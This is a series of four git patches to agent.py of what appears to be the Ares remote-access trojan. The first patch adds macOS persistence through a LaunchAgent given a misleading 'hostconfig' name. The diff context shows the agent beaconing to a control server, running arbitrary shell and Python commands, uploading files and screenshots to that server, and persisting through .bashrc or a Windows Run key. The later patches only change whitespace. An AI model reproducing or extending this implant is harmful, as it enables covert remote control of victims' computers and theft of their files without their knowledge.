From 9032efb959a11e7250a41eda4dfe1447be61d527 Mon Sep 17 00:00:00 2001 From: hollow1 Date: Fri, 15 Dec 2017 14:42:48 +0200 Subject: [PATCH 1/4] NEW Added support for MacOS, agent should be compiled as linux --- agent/agent.py | 69 ++++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 55 insertions(+), 14 deletions(-) diff --git a/agent/agent.py b/agent/agent.py index 1fb2ae9..20e203f 100755 --- a/agent/agent.py +++ b/agent/agent.py @@ -16,6 +16,7 @@ import tempfile import socket import getpass + if os.name == 'nt': from PIL import ImageGrab else: @@ -29,11 +30,11 @@ def wrapper(*_args, **kwargs): t = threading.Thread(target=func, args=_args) t.start() return + return wrapper class Agent(object): - def __init__(self): self.idle = True self.silent = False @@ -50,6 +51,8 @@ def get_install_dir(self): install_dir = self.expand_path('~/.ares') elif platform.system() == 'Windows': install_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') + elif platform.system() == 'Darwin': + install_dir = self.expand_path('~/.ares') if os.path.exists(install_dir): return install_dir else: @@ -90,7 +93,7 @@ def get_UID(self): def server_hello(self): """ Ask server for instructions """ req = requests.post(config.SERVER + '/api/' + self.uid + '/hello', - json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) + json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) return req.text def send_output(self, output, newlines=True): @@ -102,8 +105,8 @@ def send_output(self, output, newlines=True): return if newlines: output += "\n\n" - req = requests.post(config.SERVER + '/api/' + self.uid + '/report', - data={'output': output}) + req = requests.post(config.SERVER + '/api/' + self.uid + '/report', + data={'output': output}) def expand_path(self, path): """ Expand environment variables and metacharacters in a path """ @@ -113,7 +116,8 @@ def expand_path(self, path): def runcmd(self, cmd): """ Runs a shell command and returns its output """ try: - proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, + stderr=subprocess.PIPE) out, err = proc.communicate() output = (out + err) self.send_output(output) @@ -134,13 +138,13 @@ def python(self, command_or_file): with open(command_or_file, 'r') as f: python_code = f.read() try: - exec(python_code) + exec (python_code) except Exception as exc: self.send_output(traceback.format_exc()) else: self.send_output("[*] Running python command...") try: - exec(command_or_file) + exec (command_or_file) except Exception as exc: self.send_output(traceback.format_exc()) sys.stdout = old_stdout @@ -159,7 +163,7 @@ def upload(self, file): if os.path.exists(file) and os.path.isfile(file): self.send_output("[*] Uploading %s..." % file) requests.post(config.SERVER + '/api/' + self.uid + '/upload', - files={'uploaded': open(file, 'rb')}) + files={'uploaded': open(file, 'rb')}) else: self.send_output('[!] No such file: ' + file) except Exception as exc: @@ -171,7 +175,7 @@ def download(self, file, destination=''): try: destination = self.expand_path(destination) if not destination: - destination= file.split('/')[-1] + destination = file.split('/')[-1] self.send_output("[*] Downloading %s..." % file) req = requests.get(file, stream=True) with open(destination, 'wb') as f: @@ -203,7 +207,8 @@ def persist(self): f.write(desktop_entry) else: with open(self.expand_path("~/.bashrc"), "a") as f: - f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n") + f.write("\n(if [ $(ps aux|grep " + os.path.basename( + sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n") elif platform.system() == 'Windows': persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') if not os.path.exists(persist_dir): @@ -212,10 +217,36 @@ def persist(self): shutil.copyfile(sys.executable, agent_path) cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares /t REG_SZ /d \"%s\"" % agent_path subprocess.Popen(cmd, shell=True) + elif platform.system() == 'Darwin': + persist_dir = self.expand_path('~/.ares') + if not os.path.exists(persist_dir): + os.makedirs(persist_dir) + agent_path = os.path.join(persist_dir, os.path.basename(sys.executable)) + shutil.copyfile(sys.executable, agent_path) + os.system('chmod +x ' + agent_path) + if not (os.path.exists(self.expand_path('~/Library/LaunchAgents/com.jss.hostconfig.plist'))): + plist_contents = ''' + + + + + Label + com.example.hostconfig + Program + ''' + agent_path + ''' + RunAtLoad + + KeepAlive + + + + ''' + with open(self.expand_path('~/Library/LaunchAgents/com.jss.hostconfig.plist'), 'w') as f: + f.write(plist_contents) self.send_output('[+] Agent installed.') def clean(self): - """ Uninstalls the agent """ + """ Uninstalls the agent """ if platform.system() == 'Linux': persist_dir = self.expand_path('~/.ares') if os.path.exists(persist_dir): @@ -228,8 +259,16 @@ def clean(self): persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares" subprocess.Popen(cmd, shell=True) - cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir) + cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % ( + persist_dir, persist_dir) subprocess.Popen(cmd, shell=True) + elif platform.system() == 'Darwin': + persist_dir = self.expand_path('~/.ares') + if os.path.exists(persist_dir): + shutil.rmtree(persist_dir) + plist_file = '~/Library/LaunchAgents/com.jss.hostconfig.plist' + if os.path.exists(self.expand_path(plist_file)): + os.remove(plist_file) self.send_output('[+] Agent removed successfully.') def exit(self): @@ -259,7 +298,7 @@ def zip(self, zip_name, to_zip): self.send_output("[+] Archive created: %s" % zip_name) except Exception as exc: self.send_output(traceback.format_exc()) - + @threaded def screenshot(self): """ Takes a screenshot and uploads it to the server""" @@ -308,7 +347,7 @@ def run(self): if not args: self.send_output('usage: upload ') else: - self.upload(args[0],) + self.upload(args[0], ) elif command == 'download': if not args: self.send_output('usage: download ') @@ -361,9 +400,11 @@ def run(self): self.exit() time.sleep(config.HELLO_INTERVAL) + def main(): agent = Agent() agent.run() + if __name__ == "__main__": main() From 30556281d40c21fa5b360b6b4ca5eb5b1735d385 Mon Sep 17 00:00:00 2001 From: hollow1 Date: Mon, 18 Dec 2017 11:42:38 +0200 Subject: [PATCH 2/4] FIX syntax fix --- agent/agent.py | 28 +++++++++++----------------- 1 file changed, 11 insertions(+), 17 deletions(-) diff --git a/agent/agent.py b/agent/agent.py index 20e203f..6f97c8d 100755 --- a/agent/agent.py +++ b/agent/agent.py @@ -16,7 +16,6 @@ import tempfile import socket import getpass - if os.name == 'nt': from PIL import ImageGrab else: @@ -30,11 +29,11 @@ def wrapper(*_args, **kwargs): t = threading.Thread(target=func, args=_args) t.start() return - return wrapper class Agent(object): + def __init__(self): self.idle = True self.silent = False @@ -93,7 +92,7 @@ def get_UID(self): def server_hello(self): """ Ask server for instructions """ req = requests.post(config.SERVER + '/api/' + self.uid + '/hello', - json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) + json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) return req.text def send_output(self, output, newlines=True): @@ -106,7 +105,7 @@ def send_output(self, output, newlines=True): if newlines: output += "\n\n" req = requests.post(config.SERVER + '/api/' + self.uid + '/report', - data={'output': output}) + data={'output': output}) def expand_path(self, path): """ Expand environment variables and metacharacters in a path """ @@ -116,8 +115,7 @@ def expand_path(self, path): def runcmd(self, cmd): """ Runs a shell command and returns its output """ try: - proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, - stderr=subprocess.PIPE) + proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = proc.communicate() output = (out + err) self.send_output(output) @@ -138,13 +136,13 @@ def python(self, command_or_file): with open(command_or_file, 'r') as f: python_code = f.read() try: - exec (python_code) + exec(python_code) except Exception as exc: self.send_output(traceback.format_exc()) else: self.send_output("[*] Running python command...") try: - exec (command_or_file) + exec(command_or_file) except Exception as exc: self.send_output(traceback.format_exc()) sys.stdout = old_stdout @@ -163,7 +161,7 @@ def upload(self, file): if os.path.exists(file) and os.path.isfile(file): self.send_output("[*] Uploading %s..." % file) requests.post(config.SERVER + '/api/' + self.uid + '/upload', - files={'uploaded': open(file, 'rb')}) + files={'uploaded': open(file, 'rb')}) else: self.send_output('[!] No such file: ' + file) except Exception as exc: @@ -173,7 +171,7 @@ def upload(self, file): def download(self, file, destination=''): """ Downloads a file the the agent host through HTTP(S) """ try: - destination = self.expand_path(destination) + destination= self.expand_path(destination) if not destination: destination = file.split('/')[-1] self.send_output("[*] Downloading %s..." % file) @@ -207,8 +205,7 @@ def persist(self): f.write(desktop_entry) else: with open(self.expand_path("~/.bashrc"), "a") as f: - f.write("\n(if [ $(ps aux|grep " + os.path.basename( - sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n") + f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n") elif platform.system() == 'Windows': persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') if not os.path.exists(persist_dir): @@ -259,8 +256,7 @@ def clean(self): persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares" subprocess.Popen(cmd, shell=True) - cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % ( - persist_dir, persist_dir) + cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir) subprocess.Popen(cmd, shell=True) elif platform.system() == 'Darwin': persist_dir = self.expand_path('~/.ares') @@ -347,7 +343,7 @@ def run(self): if not args: self.send_output('usage: upload ') else: - self.upload(args[0], ) + self.upload(args[0],) elif command == 'download': if not args: self.send_output('usage: download ') @@ -400,11 +396,9 @@ def run(self): self.exit() time.sleep(config.HELLO_INTERVAL) - def main(): agent = Agent() agent.run() - if __name__ == "__main__": main() From 243b1a15cd44404b40dff873557062f9d6042638 Mon Sep 17 00:00:00 2001 From: hollow1 Date: Mon, 18 Dec 2017 11:46:00 +0200 Subject: [PATCH 3/4] FIX syntax fix --- agent/agent.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/agent/agent.py b/agent/agent.py index 6f97c8d..3cf3590 100755 --- a/agent/agent.py +++ b/agent/agent.py @@ -92,7 +92,7 @@ def get_UID(self): def server_hello(self): """ Ask server for instructions """ req = requests.post(config.SERVER + '/api/' + self.uid + '/hello', - json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) + json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) return req.text def send_output(self, output, newlines=True): @@ -161,7 +161,7 @@ def upload(self, file): if os.path.exists(file) and os.path.isfile(file): self.send_output("[*] Uploading %s..." % file) requests.post(config.SERVER + '/api/' + self.uid + '/upload', - files={'uploaded': open(file, 'rb')}) + files={'uploaded': open(file, 'rb')}) else: self.send_output('[!] No such file: ' + file) except Exception as exc: @@ -171,9 +171,9 @@ def upload(self, file): def download(self, file, destination=''): """ Downloads a file the the agent host through HTTP(S) """ try: - destination= self.expand_path(destination) + destination = self.expand_path(destination) if not destination: - destination = file.split('/')[-1] + destination= file.split('/')[-1] self.send_output("[*] Downloading %s..." % file) req = requests.get(file, stream=True) with open(destination, 'wb') as f: From 40938d4c119d9bd072ae4859ded650b73a6ecd1b Mon Sep 17 00:00:00 2001 From: hollow1 Date: Mon, 18 Dec 2017 11:47:02 +0200 Subject: [PATCH 4/4] FIX syntax fix --- agent/agent.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/agent/agent.py b/agent/agent.py index 3cf3590..5f11ff7 100755 --- a/agent/agent.py +++ b/agent/agent.py @@ -104,7 +104,7 @@ def send_output(self, output, newlines=True): return if newlines: output += "\n\n" - req = requests.post(config.SERVER + '/api/' + self.uid + '/report', + req = requests.post(config.SERVER + '/api/' + self.uid + '/report', data={'output': output}) def expand_path(self, path):